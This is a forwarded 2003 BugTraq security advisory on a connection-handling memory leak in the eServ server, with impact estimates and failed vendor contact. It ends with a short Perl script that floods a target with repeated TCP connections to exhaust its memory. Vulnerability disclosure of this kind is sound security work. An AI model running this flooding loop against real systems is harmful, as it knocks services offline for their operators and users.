----- Original Message -----
From: "Matthew Murphy" <mattmurphy@kc.rr.com>
To: "BugTraq" <bugtraq@securityfocus.com>
Sent: Sunday, May 11, 2003 8:21 AM
Subject: eServ Memory Leak Enables Denial of Service Attacks


> eServ Memory Leak Enables Denial of Service Attacks
>
> I. Product Description
>
> eServ is a hybrid Web server (HTTP), FTP server, mail server (POP3, SMTP,
> Finger), news server (NNTP), and proxy server.  It provides all these
> services in a single package, so that administrators are not required to
run
> multiple different packages to support these protocols.
>
> II. Vulnerability Description
>
> eServ's connection handling routine contains a memory leak that may be
> exploited to cause the eServ daemon to become unavailable.  Upon receiving
a
> connection, the server allocates a block of memory on the heap between 8
and
> 32 kilobytes in size.  The reason for this size variance was not isolated.
> This block of memory is not freed on disconnect, leading it to leak.
After
> several thousand successful connections, memory use on the system becomes
> exceedingly high.  If memory use on the system becomes excessively high,
the
> system may become unusable.
>
> III. Impact
>
> An attacker who can repeatedly establish connections with the eServ daemon
> can cause services running on the vulnerable system (including other
> services outside of eServ's process) to fail.  The vulnerability can
> actually be exploited by accident on high-traffic sites -- each connection
> causes a leak.  After about 1,000 connections, anywhere between 7.81 MB
and
> 31.25 MB may leak.
>
> To deprive an average server system of resources to the point of failure,
a
> significant number of connections is required.  After 10,000 connections,
> 78.1 MB to 312.5 MB may leak; in my experience, about 50,000 connections
is
> sufficient to cause system failure.  At this point, 390.5 MB to 1.52 GB
has
> leaked.
>
> IV. Vendor Contact
>
> I attempted to contact the vendor via info@eserv.ru and support@eserv.ru.
> The former address bounced, and no response was received from the second
> contact attempt.  eServ has a horrible security record, and I recommend
> using a production server for internet sites.
>
> V. Exploit
>
> #!/usr/bin/perl
> #LEGAL NOTICE: Don't test this on networks you don't administer,
> #and do not test this tool on networks you don't own without
> #permission of the network owner.  You are responsible for all
> #damage due to your use of this tool.
> use IO::Socket;
> print "$0: eServ Remote DoS Exploit\r\n";
> print "By Matthew Murphy \<mattmurphy\@kc.rr.com\>\r\n\r\n";
> print "Server hostname\: ";
> $host = trim(chomp($line = <STDIN>));
> print "Service port to probe\: ";
> $port = trim(chomp($line = <STDIN>));
> print "\r\nBeginning probe -- stop with CTRL+C\r\n";
> while (1) {
>  $f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host:$port");
>  undef $f;
> }
>